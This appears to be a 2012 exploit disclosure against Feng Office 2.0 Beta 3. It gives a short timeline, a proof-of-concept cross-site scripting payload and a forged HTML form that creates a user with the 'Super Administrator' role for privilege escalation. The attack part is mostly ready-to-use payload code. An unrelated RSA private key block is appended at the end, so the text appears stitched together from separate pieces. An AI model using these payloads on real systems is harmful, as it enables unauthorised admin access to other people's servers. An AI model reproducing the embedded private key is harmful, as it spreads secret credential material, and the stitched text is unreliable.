-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_@live.com # Line: GreyHat # Home: cyberpunk-ur0x.blogspot.com # Exploit Title: Feng Office Version 2.0 Beta 3 - Cross-Site Scripting / Remote Privilege Escalation # Date: 21/11/2012 # Author: Ur0b0r0x # Url Vendor: http:www.fengoffice.com/ # Vendor Name: Feng Office # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [17/11/2012] - Vulnerability discovered [19/11/2012] - Vendor notified Dont responsed [21/11/2012] - Public disclosure -------------------------------------------------- # Proof of Concept Video http://www.youtube.com/watch?v=Q_B_5VkAVhU # Expl0it/P0c/Xss ################### <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> # Expl0it/P0c/Privilege Escalation ################### <input type="hidden" value="" name="contact[new_contact_from_mail_div_id]"> <input type="hidden" value="" name="contact[hf_contacts]"> <label for="og_1353469580_283914profileFormFirstName">First name: <input type="text" value="poc" name="contact[first_name]" maxlength="50" id="og_1353469580_283914profileFormFirstName"> <label for="og_1353469580_283914profileFormSurName">Last name: <input type="text" value="poc2" name="contact[surname]" maxlength="50" id="og_1353469580_283914profileFormSurname"> <label for="og_1353469580_283914profileFormEmail">Email address:</label> <input type="text" value="poctest@live.com" name="contact[email]" style="width:260px;" maxlength="100" id="og_1353469580_283914profileFormEmail"> <div style="" class="user-data"> <label>Password:<input type="password" name="contact[user][password]"> <label>Repeat password:<input type="password" name="contact[user][password_a]" class="field-error"> <select name="contact[user][type]"> <option value="1">Super Administrator</option> <button tabindex="20000" id="og_1353471270_613002submit2" class="submit" type="submit" accesskey="s">Add Per<u>s</u>on</button> -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi 2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8 GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/ WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R 8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM 8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/ -----END RSA PRIVATE KEY-----